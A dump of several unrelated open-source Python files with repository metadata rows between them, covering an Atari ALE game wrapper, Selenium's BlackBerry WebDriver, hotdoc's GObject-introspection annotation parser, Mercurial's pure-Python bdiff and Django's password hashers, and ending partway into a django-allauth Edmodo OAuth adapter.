self.ale.getScreenGrayscale(self.screen_buffer[i % self.screen_buffer_length, :, :])
self.total_reward += reward
self.episode_reward += reward
ob = self.get_observation()
terminate_flag = self.episode_terminate
self.replay_memory.append(ob, a, numpy.clip(reward, -1, 1), terminate_flag)
return reward, terminate_flag
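# Minimal usage sketch (illustrative; assumes the ALE bindings and the
# default breakout ROM are available):
#
#   game = AtariGame(display_screen=False)
#   game.begin_episode(max_episode_step=1000)
#   while not game.episode_terminate:
#       action = game.rng.randint(len(game.action_set))
#       reward, terminal = game.play(action)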
| apache-2.0 | 3,069,754,307,413,965,000 | 40.55814 | 100 | 0.607303 | false |
LukeMurphey/splunk-network-tools | tests/selenium/webdriver/blackberry/webdriver.py | 44 | 4870 | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import platform
import subprocess
try:
import http.client as http_client
except ImportError:
import httplib as http_client
from selenium.webdriver.remote.webdriver import WebDriver as RemoteWebDriver
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.support.ui import WebDriverWait
LOAD_TIMEOUT = 5
class WebDriver(RemoteWebDriver):
"""
Controls the BlackBerry Browser and allows you to drive it.
:Args:
- device_password - password for the BlackBerry device or emulator you are
trying to drive
- bb_tools_dir path to the blackberry-deploy executable. If the default
is used it assumes it is in the $PATH
- hostip - the ip for the device you are trying to drive. Falls back to
169.254.0.1 which is the default ip used
- port - the port being used for WebDriver on device. defaults to 1338
- desired_capabilities: Dictionary object with non-browser specific
capabilities only, such as "proxy" or "loggingPref".
Note: To get blackberry-deploy you will need to install the BlackBerry
WebWorks SDK - the default install will put it in the $PATH for you.
Download at https://developer.blackberry.com/html5/downloads/
"""
def __init__(self, device_password, bb_tools_dir=None,
hostip='169.254.0.1', port=1338, desired_capabilities={}):
remote_addr = 'http://{}:{}'.format(hostip, port)
filename = 'blackberry-deploy'
if platform.system() == "Windows":
filename += '.bat'
if bb_tools_dir is not None:
if os.path.isdir(bb_tools_dir):
bb_deploy_location = os.path.join(bb_tools_dir, filename)
if not os.path.isfile(bb_deploy_location):
raise WebDriverException('Invalid blackberry-deploy location: {}'.format(bb_deploy_location))
else:
raise WebDriverException('Invalid blackberry tools location, must be a directory: {}'.format(bb_tools_dir))
else:
bb_deploy_location = filename
"""
Now launch the BlackBerry browser before allowing anything else to run.
"""
try:
launch_args = [bb_deploy_location,
'-launchApp',
str(hostip),
'-package-name', 'sys.browser',
'-package-id', 'gYABgJYFHAzbeFMPCCpYWBtHAm0',
'-password', str(device_password)]
with open(os.devnull, 'w') as fp:
p = subprocess.Popen(launch_args, stdout=fp)
returncode = p.wait()
if returncode == 0:
# wait for the BlackBerry10 browser to load.
is_running_args = [bb_deploy_location,
'-isAppRunning',
str(hostip),
'-package-name', 'sys.browser',
'-package-id', 'gYABgJYFHAzbeFMPCCpYWBtHAm0',
'-password', str(device_password)]
                # str.find() returns -1 when the marker is absent, so
                # compare explicitly instead of relying on truthiness.
                WebDriverWait(None, LOAD_TIMEOUT)\
                    .until(lambda x: subprocess.check_output(is_running_args)
                           .find('result::true') != -1,
                           message='waiting for BlackBerry10 browser to load')
RemoteWebDriver.__init__(self,
command_executor=remote_addr,
desired_capabilities=desired_capabilities)
else:
raise WebDriverException('blackberry-deploy failed to launch browser')
except Exception as e:
raise WebDriverException('Something went wrong launching blackberry-deploy', stacktrace=getattr(e, 'stacktrace', None))
def quit(self):
"""
Closes the browser and shuts down the
"""
try:
RemoteWebDriver.quit(self)
except http_client.BadStatusLine:
pass
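# Minimal usage sketch (illustrative; the password and tools directory
# are placeholders for a real device setup):
#
#   driver = WebDriver(device_password='secret',
#                      bb_tools_dir='/path/to/bbndk/host/usr/bin')
#   driver.get('http://example.com')
#   driver.quit()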
| apache-2.0 | 5,285,876,427,348,523,000 | 40.982759 | 131 | 0.606982 | false |
hotdoc/hotdoc | hotdoc/extensions/gi/annotation_parser.py | 1 | 7809 | # -*- coding: utf-8 -*-
#
# Copyright © 2015,2016 Mathieu Duponchelle <[email protected]>
# Copyright © 2015,2016 Collabora Ltd
#
# This library is free software; you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# This library is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
ALLOW_NONE_HELP = \
"NULL is OK, both for passing and returning"
TRANSFER_NONE_HELP = \
"Don't free data after the code is done"
TRANSFER_FULL_HELP = \
"Free data after the code is done"
TRANSFER_FLOATING_HELP = \
"Alias for transfer none, used for objects with floating refs"
TRANSFER_CONTAINER_HELP = \
"Free data container after the code is done"
CLOSURE_HELP = \
"This parameter is a closure for callbacks, many bindings can pass NULL to %s"
CLOSURE_DATA_HELP = \
"This parameter is a closure for callbacks, many bindings can pass NULL here"
DIRECTION_OUT_HELP = \
"Parameter for returning results"
DIRECTION_INOUT_HELP = \
"Parameter for input and for returning results"
DIRECTION_IN_HELP = \
"Parameter for input. Default is transfer none"
ARRAY_HELP = \
"Parameter points to an array of items"
ELEMENT_TYPE_HELP = \
"Generic and defining element of containers and arrays"
SCOPE_ASYNC_HELP = \
"The callback is valid until first called"
SCOPE_CALL_HELP = \
"The callback is valid only during the call to the method"
SCOPE_NOTIFIED_HELP = \
"The callback is valid until the GDestroyNotify argument is called"
NULLABLE_HELP = \
"NULL may be passed to the value"
NOT_NULLABLE_HELP = \
"NULL is *not* OK, either for passing or returning"
DEFAULT_HELP = \
"Default parameter value (for in case the shadows-to function has less parameters)"
DESTROY_HELP = \
"The parameter is a 'destroy_data' for callbacks."
# Beware: 'optional' is very different from the previous annotation.
OPTIONAL_HELP = \
"NULL may be passed instead of a pointer to a location"
# Overrides the C type parsed from the source.
TYPE_HELP = \
"Override the parsed C type with given type"
class GIAnnotation (object):
def __init__(self, nick, help_text, value=None):
self.nick = nick
self.help_text = help_text
self.value = value
class GIAnnotationParser(object):
def __init__(self):
self.__annotation_factories = \
{"allow-none": self.__make_allow_none_annotation,
"transfer": self.__make_transfer_annotation,
"inout": self.__make_inout_annotation,
"out": self.__make_out_annotation,
"in": self.__make_in_annotation,
"array": self.__make_array_annotation,
"element-type": self.__make_element_type_annotation,
"scope": self.__make_scope_annotation,
"closure": self.__make_closure_annotation,
"nullable": self.__make_nullable_annotation,
"type": self.__make_type_annotation,
"optional": self.__make_optional_annotation,
"default": self.__make_default_annotation,
"destroy": self.__make_destroy_annotation,
}
def __make_type_annotation (self, annotation, value):
if not value:
return None
return GIAnnotation("type", TYPE_HELP, value[0])
def __make_nullable_annotation (self, annotation, value):
return GIAnnotation("nullable", NULLABLE_HELP)
def __make_optional_annotation (self, annotation, value):
return GIAnnotation ("optional", OPTIONAL_HELP)
def __make_allow_none_annotation(self, annotation, value):
return GIAnnotation ("allow-none", ALLOW_NONE_HELP)
def __make_transfer_annotation(self, annotation, value):
if value[0] == "none":
return GIAnnotation ("transfer: none", TRANSFER_NONE_HELP)
elif value[0] == "full":
return GIAnnotation ("transfer: full", TRANSFER_FULL_HELP)
elif value[0] == "floating":
return GIAnnotation ("transfer: floating", TRANSFER_FLOATING_HELP)
elif value[0] == "container":
return GIAnnotation ("transfer: container", TRANSFER_CONTAINER_HELP)
else:
return None
def __make_inout_annotation (self, annotation, value):
return GIAnnotation ("inout", DIRECTION_INOUT_HELP)
def __make_out_annotation (self, annotation, value):
return GIAnnotation ("out", DIRECTION_OUT_HELP)
def __make_in_annotation (self, annotation, value):
return GIAnnotation ("in", DIRECTION_IN_HELP)
def __make_element_type_annotation (self, annotation, value):
annotation_val = None
if type(value) == list:
annotation_val = value[0]
return GIAnnotation ("element-type", ELEMENT_TYPE_HELP, annotation_val)
def __make_array_annotation (self, annotation, value):
annotation_val = None
if type(value) == dict:
annotation_val = ""
for name, val in value.items():
annotation_val += "%s=%s" % (name, val)
return GIAnnotation ("array", ARRAY_HELP, annotation_val)
def __make_scope_annotation (self, annotation, value):
if type (value) != list or not value:
return None
if value[0] == "async":
return GIAnnotation ("scope async", SCOPE_ASYNC_HELP)
elif value[0] == "call":
return GIAnnotation ("scope call", SCOPE_CALL_HELP)
elif value[0] == 'notified':
return GIAnnotation ("scope notified", SCOPE_NOTIFIED_HELP)
return None
def __make_closure_annotation (self, annotation, value):
if type (value) != list or not value:
return GIAnnotation ("closure", CLOSURE_DATA_HELP)
return GIAnnotation ("closure", CLOSURE_HELP % value[0])
def __make_default_annotation (self, annotation, value):
return GIAnnotation ("default %s" % str (value[0]), DEFAULT_HELP)
def __make_destroy_annotation (self, annotation, value):
if value:
return GIAnnotation ("destroy %s" % str (value[0]), DESTROY_HELP)
else:
return GIAnnotation ("destroy", DESTROY_HELP)
def __make_not_nullable_annotation(self):
return GIAnnotation("not nullable", NOT_NULLABLE_HELP)
def __create_annotation (self, annotation_name, annotation_value):
factory = self.__annotation_factories.get(annotation_name)
if not factory:
return None
return factory (annotation_name, annotation_value)
def make_annotations (self, parameter):
if not parameter.comment:
return []
if not parameter.comment.annotations:
return []
annotations = []
for ann, val in parameter.comment.annotations.items():
if ann == "skip":
continue
annotation = self.__create_annotation (ann, val.argument)
if not annotation:
# Special case for silly specification
if (ann == 'not' and len(val.argument) == 1 and
val.argument[0] == 'nullable'):
annotations.append(self.__make_not_nullable_annotation())
else:
print("This parameter annotation is unknown :[" + ann + "]", val.argument)
continue
annotations.append (annotation)
return annotations
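# Minimal usage sketch ('parameter' is a hypothetical object carrying a
# parsed comment, as produced by hotdoc's comment parser):
#
#     parser = GIAnnotationParser()
#     for annotation in parser.make_annotations(parameter):
#         print(annotation.nick, '->', annotation.help_text)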
| lgpl-2.1 | -1,495,014,013,697,048,800 | 34.648402 | 94 | 0.636352 | false |
MER-GROUP/intellij-community | plugins/hg4idea/testData/bin/mercurial/bdiff.py | 96 | 2318 | # bdiff.py - Python implementation of bdiff.c
#
# Copyright 2009 Matt Mackall <[email protected]> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
import struct, difflib, re
def splitnewlines(text):
'''like str.splitlines, but only split on newlines.'''
lines = [l + '\n' for l in text.split('\n')]
if lines:
if lines[-1] == '\n':
lines.pop()
else:
lines[-1] = lines[-1][:-1]
return lines
def _normalizeblocks(a, b, blocks):
prev = None
r = []
for curr in blocks:
if prev is None:
prev = curr
continue
shift = 0
a1, b1, l1 = prev
a1end = a1 + l1
b1end = b1 + l1
a2, b2, l2 = curr
a2end = a2 + l2
b2end = b2 + l2
if a1end == a2:
while (a1end + shift < a2end and
a[a1end + shift] == b[b1end + shift]):
shift += 1
elif b1end == b2:
while (b1end + shift < b2end and
a[a1end + shift] == b[b1end + shift]):
shift += 1
r.append((a1, b1, l1 + shift))
prev = a2 + shift, b2 + shift, l2 - shift
r.append(prev)
return r
def bdiff(a, b):
a = str(a).splitlines(True)
b = str(b).splitlines(True)
if not a:
s = "".join(b)
return s and (struct.pack(">lll", 0, 0, len(s)) + s)
bin = []
p = [0]
for i in a: p.append(p[-1] + len(i))
d = difflib.SequenceMatcher(None, a, b).get_matching_blocks()
d = _normalizeblocks(a, b, d)
la = 0
lb = 0
for am, bm, size in d:
s = "".join(b[lb:bm])
if am > la or s:
bin.append(struct.pack(">lll", p[la], p[am], len(s)) + s)
la = am + size
lb = bm + size
return "".join(bin)
def blocks(a, b):
an = splitnewlines(a)
bn = splitnewlines(b)
d = difflib.SequenceMatcher(None, an, bn).get_matching_blocks()
d = _normalizeblocks(an, bn, d)
return [(i, i + n, j, j + n) for (i, j, n) in d]
def fixws(text, allws):
if allws:
text = re.sub('[ \t\r]+', '', text)
else:
text = re.sub('[ \t\r]+', ' ', text)
text = text.replace(' \n', '\n')
return text
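# Worked example (sketch): a one-line change yields a single binary hunk of
# the form <start><end><length> + replacement bytes, with offsets into the
# old text:
#
#     patch = bdiff("a\nb\n", "a\nc\n")
#     start, end, length = struct.unpack(">lll", patch[:12])
#     # start == 2, end == 4: bytes [2, 4) of the old text are replaced
#     # by patch[12:12 + length], i.e. "c\n"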
| apache-2.0 | 6,327,118,730,232,321,000 | 25.643678 | 73 | 0.502588 | false |
nitin-cherian/Webapps | SimpleIsBetterThanComplex.com/myproject/.env/lib/python3.5/site-packages/django/contrib/auth/hashers.py | 64 | 22352 | from __future__ import unicode_literals
import base64
import binascii
import hashlib
import importlib
import warnings
from collections import OrderedDict
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.signals import setting_changed
from django.dispatch import receiver
from django.utils import lru_cache
from django.utils.crypto import (
constant_time_compare, get_random_string, pbkdf2,
)
from django.utils.encoding import force_bytes, force_str, force_text
from django.utils.module_loading import import_string
from django.utils.translation import ugettext_noop as _
UNUSABLE_PASSWORD_PREFIX = '!' # This will never be a valid encoded hash
UNUSABLE_PASSWORD_SUFFIX_LENGTH = 40 # number of random chars to add after UNUSABLE_PASSWORD_PREFIX
def is_password_usable(encoded):
if encoded is None or encoded.startswith(UNUSABLE_PASSWORD_PREFIX):
return False
try:
identify_hasher(encoded)
except ValueError:
return False
return True
def check_password(password, encoded, setter=None, preferred='default'):
"""
Returns a boolean of whether the raw password matches the three
part encoded digest.
If setter is specified, it'll be called when you need to
regenerate the password.
"""
if password is None or not is_password_usable(encoded):
return False
preferred = get_hasher(preferred)
hasher = identify_hasher(encoded)
hasher_changed = hasher.algorithm != preferred.algorithm
must_update = hasher_changed or preferred.must_update(encoded)
is_correct = hasher.verify(password, encoded)
# If the hasher didn't change (we don't protect against enumeration if it
# does) and the password should get updated, try to close the timing gap
# between the work factor of the current encoded password and the default
# work factor.
if not is_correct and not hasher_changed and must_update:
hasher.harden_runtime(password, encoded)
if setter and is_correct and must_update:
setter(password)
return is_correct
def make_password(password, salt=None, hasher='default'):
"""
Turn a plain-text password into a hash for database storage
Same as encode() but generates a new random salt.
If password is None then a concatenation of
UNUSABLE_PASSWORD_PREFIX and a random string will be returned
which disallows logins. Additional random string reduces chances
of gaining access to staff or superuser accounts.
See ticket #20079 for more info.
"""
if password is None:
return UNUSABLE_PASSWORD_PREFIX + get_random_string(UNUSABLE_PASSWORD_SUFFIX_LENGTH)
hasher = get_hasher(hasher)
if not salt:
salt = hasher.salt()
return hasher.encode(password, salt)
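# Round-trip sketch (assumes Django settings are configured with at least
# one hasher in PASSWORD_HASHERS; values shown are illustrative):
#
#     encoded = make_password('s3cret')
#     # e.g. 'pbkdf2_sha256$36000$<salt>$<base64 digest>'
#     assert check_password('s3cret', encoded)
#     assert not check_password('wrong', encoded)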
@lru_cache.lru_cache()
def get_hashers():
hashers = []
for hasher_path in settings.PASSWORD_HASHERS:
hasher_cls = import_string(hasher_path)
hasher = hasher_cls()
if not getattr(hasher, 'algorithm'):
raise ImproperlyConfigured("hasher doesn't specify an "
"algorithm name: %s" % hasher_path)
hashers.append(hasher)
return hashers
@lru_cache.lru_cache()
def get_hashers_by_algorithm():
return {hasher.algorithm: hasher for hasher in get_hashers()}
@receiver(setting_changed)
def reset_hashers(**kwargs):
if kwargs['setting'] == 'PASSWORD_HASHERS':
get_hashers.cache_clear()
get_hashers_by_algorithm.cache_clear()
def get_hasher(algorithm='default'):
"""
Returns an instance of a loaded password hasher.
If algorithm is 'default', the default hasher will be returned.
This function will also lazy import hashers specified in your
settings file if needed.
"""
if hasattr(algorithm, 'algorithm'):
return algorithm
elif algorithm == 'default':
return get_hashers()[0]
else:
hashers = get_hashers_by_algorithm()
try:
return hashers[algorithm]
except KeyError:
raise ValueError("Unknown password hashing algorithm '%s'. "
"Did you specify it in the PASSWORD_HASHERS "
"setting?" % algorithm)
def identify_hasher(encoded):
"""
Returns an instance of a loaded password hasher.
Identifies hasher algorithm by examining encoded hash, and calls
get_hasher() to return hasher. Raises ValueError if
algorithm cannot be identified, or if hasher is not loaded.
"""
# Ancient versions of Django created plain MD5 passwords and accepted
# MD5 passwords with an empty salt.
if ((len(encoded) == 32 and '$' not in encoded) or
(len(encoded) == 37 and encoded.startswith('md5$$'))):
algorithm = 'unsalted_md5'
# Ancient versions of Django accepted SHA1 passwords with an empty salt.
elif len(encoded) == 46 and encoded.startswith('sha1$$'):
algorithm = 'unsalted_sha1'
else:
algorithm = encoded.split('$', 1)[0]
return get_hasher(algorithm)
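# e.g. identify_hasher('pbkdf2_sha256$36000$<salt>$<hash>') returns the
# PBKDF2 hasher, while a bare 32-character hex digest maps to
# 'unsalted_md5' (sketch; the algorithm must be loadable via get_hasher).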
def mask_hash(hash, show=6, char="*"):
"""
Returns the given hash, with only the first ``show`` number shown. The
rest are masked with ``char`` for security reasons.
"""
masked = hash[:show]
masked += char * len(hash[show:])
return masked
class BasePasswordHasher(object):
"""
Abstract base class for password hashers
When creating your own hasher, you need to override algorithm,
verify(), encode() and safe_summary().
PasswordHasher objects are immutable.
"""
algorithm = None
library = None
def _load_library(self):
if self.library is not None:
if isinstance(self.library, (tuple, list)):
name, mod_path = self.library
else:
mod_path = self.library
try:
module = importlib.import_module(mod_path)
except ImportError as e:
raise ValueError("Couldn't load %r algorithm library: %s" %
(self.__class__.__name__, e))
return module
raise ValueError("Hasher %r doesn't specify a library attribute" %
self.__class__.__name__)
def salt(self):
"""
Generates a cryptographically secure nonce salt in ASCII
"""
return get_random_string()
def verify(self, password, encoded):
"""
Checks if the given password is correct
"""
raise NotImplementedError('subclasses of BasePasswordHasher must provide a verify() method')
def encode(self, password, salt):
"""
Creates an encoded database value
The result is normally formatted as "algorithm$salt$hash" and
must be fewer than 128 characters.
"""
raise NotImplementedError('subclasses of BasePasswordHasher must provide an encode() method')
def safe_summary(self, encoded):
"""
Returns a summary of safe values
The result is a dictionary and will be used where the password field
must be displayed to construct a safe representation of the password.
"""
raise NotImplementedError('subclasses of BasePasswordHasher must provide a safe_summary() method')
def must_update(self, encoded):
return False
def harden_runtime(self, password, encoded):
"""
Bridge the runtime gap between the work factor supplied in `encoded`
and the work factor suggested by this hasher.
Taking PBKDF2 as an example, if `encoded` contains 20000 iterations and
`self.iterations` is 30000, this method should run password through
another 10000 iterations of PBKDF2. Similar approaches should exist
for any hasher that has a work factor. If not, this method should be
defined as a no-op to silence the warning.
"""
warnings.warn('subclasses of BasePasswordHasher should provide a harden_runtime() method')
class PBKDF2PasswordHasher(BasePasswordHasher):
"""
Secure password hashing using the PBKDF2 algorithm (recommended)
Configured to use PBKDF2 + HMAC + SHA256.
The result is a 64 byte binary string. Iterations may be changed
safely but you must rename the algorithm if you change SHA256.
"""
algorithm = "pbkdf2_sha256"
iterations = 36000
digest = hashlib.sha256
def encode(self, password, salt, iterations=None):
assert password is not None
assert salt and '$' not in salt
if not iterations:
iterations = self.iterations
hash = pbkdf2(password, salt, iterations, digest=self.digest)
hash = base64.b64encode(hash).decode('ascii').strip()
return "%s$%d$%s$%s" % (self.algorithm, iterations, salt, hash)
def verify(self, password, encoded):
algorithm, iterations, salt, hash = encoded.split('$', 3)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, salt, int(iterations))
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, iterations, salt, hash = encoded.split('$', 3)
assert algorithm == self.algorithm
return OrderedDict([
(_('algorithm'), algorithm),
(_('iterations'), iterations),
(_('salt'), mask_hash(salt)),
(_('hash'), mask_hash(hash)),
])
def must_update(self, encoded):
algorithm, iterations, salt, hash = encoded.split('$', 3)
return int(iterations) != self.iterations
def harden_runtime(self, password, encoded):
algorithm, iterations, salt, hash = encoded.split('$', 3)
extra_iterations = self.iterations - int(iterations)
if extra_iterations > 0:
self.encode(password, salt, extra_iterations)
class PBKDF2SHA1PasswordHasher(PBKDF2PasswordHasher):
"""
Alternate PBKDF2 hasher which uses SHA1, the default PRF
recommended by PKCS #5. This is compatible with other
implementations of PBKDF2, such as openssl's
PKCS5_PBKDF2_HMAC_SHA1().
"""
algorithm = "pbkdf2_sha1"
digest = hashlib.sha1
class Argon2PasswordHasher(BasePasswordHasher):
"""
Secure password hashing using the argon2 algorithm.
This is the winner of the Password Hashing Competition 2013-2015
(https://password-hashing.net). It requires the argon2-cffi library which
depends on native C code and might cause portability issues.
"""
algorithm = 'argon2'
library = 'argon2'
time_cost = 2
memory_cost = 512
parallelism = 2
def encode(self, password, salt):
argon2 = self._load_library()
data = argon2.low_level.hash_secret(
force_bytes(password),
force_bytes(salt),
time_cost=self.time_cost,
memory_cost=self.memory_cost,
parallelism=self.parallelism,
hash_len=argon2.DEFAULT_HASH_LENGTH,
type=argon2.low_level.Type.I,
)
return self.algorithm + data.decode('ascii')
def verify(self, password, encoded):
argon2 = self._load_library()
algorithm, rest = encoded.split('$', 1)
assert algorithm == self.algorithm
try:
return argon2.low_level.verify_secret(
force_bytes('$' + rest),
force_bytes(password),
type=argon2.low_level.Type.I,
)
except argon2.exceptions.VerificationError:
return False
def safe_summary(self, encoded):
(algorithm, variety, version, time_cost, memory_cost, parallelism,
salt, data) = self._decode(encoded)
assert algorithm == self.algorithm
return OrderedDict([
(_('algorithm'), algorithm),
(_('variety'), variety),
(_('version'), version),
(_('memory cost'), memory_cost),
(_('time cost'), time_cost),
(_('parallelism'), parallelism),
(_('salt'), mask_hash(salt)),
(_('hash'), mask_hash(data)),
])
def must_update(self, encoded):
(algorithm, variety, version, time_cost, memory_cost, parallelism,
salt, data) = self._decode(encoded)
assert algorithm == self.algorithm
argon2 = self._load_library()
return (
argon2.low_level.ARGON2_VERSION != version or
self.time_cost != time_cost or
self.memory_cost != memory_cost or
self.parallelism != parallelism
)
def harden_runtime(self, password, encoded):
# The runtime for Argon2 is too complicated to implement a sensible
# hardening algorithm.
pass
def _decode(self, encoded):
"""
Split an encoded hash and return: (
algorithm, variety, version, time_cost, memory_cost,
parallelism, salt, data,
).
"""
bits = encoded.split('$')
if len(bits) == 5:
# Argon2 < 1.3
algorithm, variety, raw_params, salt, data = bits
version = 0x10
else:
assert len(bits) == 6
algorithm, variety, raw_version, raw_params, salt, data = bits
assert raw_version.startswith('v=')
version = int(raw_version[len('v='):])
params = dict(bit.split('=', 1) for bit in raw_params.split(','))
assert len(params) == 3 and all(x in params for x in ('t', 'm', 'p'))
time_cost = int(params['t'])
memory_cost = int(params['m'])
parallelism = int(params['p'])
return (
algorithm, variety, version, time_cost, memory_cost, parallelism,
salt, data,
)
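    # Decoding sketch: an argon2 >= 1.3 value such as
    #     'argon2$argon2i$v=19$m=512,t=2,p=2$<salt>$<data>'
    # yields (algorithm='argon2', variety='argon2i', version=19,
    # time_cost=2, memory_cost=512, parallelism=2, salt, data).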
class BCryptSHA256PasswordHasher(BasePasswordHasher):
"""
Secure password hashing using the bcrypt algorithm (recommended)
This is considered by many to be the most secure algorithm but you
must first install the bcrypt library. Please be warned that
this library depends on native C code and might cause portability
issues.
"""
algorithm = "bcrypt_sha256"
digest = hashlib.sha256
library = ("bcrypt", "bcrypt")
rounds = 12
def salt(self):
bcrypt = self._load_library()
return bcrypt.gensalt(self.rounds)
def encode(self, password, salt):
bcrypt = self._load_library()
# Hash the password prior to using bcrypt to prevent password
# truncation as described in #20138.
if self.digest is not None:
# Use binascii.hexlify() because a hex encoded bytestring is
# Unicode on Python 3.
password = binascii.hexlify(self.digest(force_bytes(password)).digest())
else:
password = force_bytes(password)
data = bcrypt.hashpw(password, salt)
return "%s$%s" % (self.algorithm, force_text(data))
def verify(self, password, encoded):
algorithm, data = encoded.split('$', 1)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, force_bytes(data))
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, empty, algostr, work_factor, data = encoded.split('$', 4)
assert algorithm == self.algorithm
salt, checksum = data[:22], data[22:]
return OrderedDict([
(_('algorithm'), algorithm),
(_('work factor'), work_factor),
(_('salt'), mask_hash(salt)),
(_('checksum'), mask_hash(checksum)),
])
def must_update(self, encoded):
algorithm, empty, algostr, rounds, data = encoded.split('$', 4)
return int(rounds) != self.rounds
def harden_runtime(self, password, encoded):
_, data = encoded.split('$', 1)
salt = data[:29] # Length of the salt in bcrypt.
rounds = data.split('$')[2]
# work factor is logarithmic, adding one doubles the load.
diff = 2**(self.rounds - int(rounds)) - 1
while diff > 0:
self.encode(password, force_bytes(salt))
diff -= 1
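    # e.g. an old hash at 10 rounds against self.rounds == 12 gives
    # diff = 2**(12 - 10) - 1 = 3 extra encode() calls, matching the
    # doubling of work per additional round.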
class BCryptPasswordHasher(BCryptSHA256PasswordHasher):
"""
Secure password hashing using the bcrypt algorithm
This is considered by many to be the most secure algorithm but you
must first install the bcrypt library. Please be warned that
this library depends on native C code and might cause portability
issues.
This hasher does not first hash the password which means it is subject to
the 72 character bcrypt password truncation, most use cases should prefer
the BCryptSHA256PasswordHasher.
See: https://code.djangoproject.com/ticket/20138
"""
algorithm = "bcrypt"
digest = None
class SHA1PasswordHasher(BasePasswordHasher):
"""
The SHA1 password hashing algorithm (not recommended)
"""
algorithm = "sha1"
def encode(self, password, salt):
assert password is not None
assert salt and '$' not in salt
hash = hashlib.sha1(force_bytes(salt + password)).hexdigest()
return "%s$%s$%s" % (self.algorithm, salt, hash)
def verify(self, password, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, salt)
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
return OrderedDict([
(_('algorithm'), algorithm),
(_('salt'), mask_hash(salt, show=2)),
(_('hash'), mask_hash(hash)),
])
def harden_runtime(self, password, encoded):
pass
class MD5PasswordHasher(BasePasswordHasher):
"""
The Salted MD5 password hashing algorithm (not recommended)
"""
algorithm = "md5"
def encode(self, password, salt):
assert password is not None
assert salt and '$' not in salt
hash = hashlib.md5(force_bytes(salt + password)).hexdigest()
return "%s$%s$%s" % (self.algorithm, salt, hash)
def verify(self, password, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
encoded_2 = self.encode(password, salt)
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
algorithm, salt, hash = encoded.split('$', 2)
assert algorithm == self.algorithm
return OrderedDict([
(_('algorithm'), algorithm),
(_('salt'), mask_hash(salt, show=2)),
(_('hash'), mask_hash(hash)),
])
def harden_runtime(self, password, encoded):
pass
class UnsaltedSHA1PasswordHasher(BasePasswordHasher):
"""
Very insecure algorithm that you should *never* use; stores SHA1 hashes
with an empty salt.
This class is implemented because Django used to accept such password
hashes. Some older Django installs still have these values lingering
around so we need to handle and upgrade them properly.
"""
algorithm = "unsalted_sha1"
def salt(self):
return ''
def encode(self, password, salt):
assert salt == ''
hash = hashlib.sha1(force_bytes(password)).hexdigest()
return 'sha1$$%s' % hash
def verify(self, password, encoded):
encoded_2 = self.encode(password, '')
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
assert encoded.startswith('sha1$$')
hash = encoded[6:]
return OrderedDict([
(_('algorithm'), self.algorithm),
(_('hash'), mask_hash(hash)),
])
def harden_runtime(self, password, encoded):
pass
class UnsaltedMD5PasswordHasher(BasePasswordHasher):
"""
Incredibly insecure algorithm that you should *never* use; stores unsalted
MD5 hashes without the algorithm prefix, also accepts MD5 hashes with an
empty salt.
This class is implemented because Django used to store passwords this way
and to accept such password hashes. Some older Django installs still have
these values lingering around so we need to handle and upgrade them
properly.
"""
algorithm = "unsalted_md5"
def salt(self):
return ''
def encode(self, password, salt):
assert salt == ''
return hashlib.md5(force_bytes(password)).hexdigest()
def verify(self, password, encoded):
if len(encoded) == 37 and encoded.startswith('md5$$'):
encoded = encoded[5:]
encoded_2 = self.encode(password, '')
return constant_time_compare(encoded, encoded_2)
def safe_summary(self, encoded):
return OrderedDict([
(_('algorithm'), self.algorithm),
(_('hash'), mask_hash(encoded, show=3)),
])
def harden_runtime(self, password, encoded):
pass
class CryptPasswordHasher(BasePasswordHasher):
"""
Password hashing using UNIX crypt (not recommended)
The crypt module is not supported on all platforms.
"""
algorithm = "crypt"
library = "crypt"
def salt(self):
return get_random_string(2)
def encode(self, password, salt):
crypt = self._load_library()
assert len(salt) == 2
data = crypt.crypt(force_str(password), salt)
assert data is not None # A platform like OpenBSD with a dummy crypt module.
# we don't need to store the salt, but Django used to do this
return "%s$%s$%s" % (self.algorithm, '', data)
def verify(self, password, encoded):
crypt = self._load_library()
algorithm, salt, data = encoded.split('$', 2)
assert algorithm == self.algorithm
return constant_time_compare(data, crypt.crypt(force_str(password), data))
def safe_summary(self, encoded):
algorithm, salt, data = encoded.split('$', 2)
assert algorithm == self.algorithm
return OrderedDict([
(_('algorithm'), algorithm),
(_('salt'), salt),
(_('hash'), mask_hash(data, show=3)),
])
def harden_runtime(self, password, encoded):
pass
| mit | -218,046,103,862,718,460 | 33.229709 | 106 | 0.628624 | false |
beswarm/django-allauth | allauth/socialaccount/providers/edmodo/views.py | 40 | 1075 | import requests
from allauth.socialaccount.providers.oauth2.views import (OAuth2Adapter,
OAuth2LoginView,
OAuth2CallbackView)
from allauth.socialaccount.providers import registry
from .provider import EdmodoProvider
class EdmodoOAuth2Adapter(OAuth2Adapter):
provider_id = EdmodoProvider.id
